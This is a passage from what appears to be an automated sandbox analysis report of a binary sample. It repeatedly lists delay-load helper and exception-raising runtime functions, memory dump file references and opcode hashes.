                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d18ea00f69753e2a89f57ac6602b1d754673cef5f428f975d151334c47c08d31
                                                            • Instruction ID: 54d91ef4607e92cc17a9debe6fed04dbb040e2aab48591c3f293e00d43f20e13
                                                            • Opcode Fuzzy Hash: d18ea00f69753e2a89f57ac6602b1d754673cef5f428f975d151334c47c08d31
                                                            • Instruction Fuzzy Hash: 1AB012D135C154AC3144711A2D02C3B014CC0C1B28330803FFF05C83C1D840AC003432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: db1babc88a72de3b1b47c92c3561b2fb04d8ca18855abf0dd7b7acb3c0d012f1
                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                            • Opcode Fuzzy Hash: db1babc88a72de3b1b47c92c3561b2fb04d8ca18855abf0dd7b7acb3c0d012f1
                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 82edf685798d621dac3ae1328fceb84549465ea026689a039c2399c7060ae2f4
                                                            • Instruction ID: 2a5b9199aa232d9c2ae8bc71c6e955bbead33276d006ddaca92ff94550044b79
                                                            • Opcode Fuzzy Hash: 82edf685798d621dac3ae1328fceb84549465ea026689a039c2399c7060ae2f4
                                                            • Instruction Fuzzy Hash: 3CA001E62A919A7D324872566E46C3B025DC8C1B29330952FFA25E96D1AC9018456873
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b6af567acd30339c259eaab2d5594f8893139c0fb6a739c5cb18bc77e48814b4
                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                            • Opcode Fuzzy Hash: b6af567acd30339c259eaab2d5594f8893139c0fb6a739c5cb18bc77e48814b4
                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
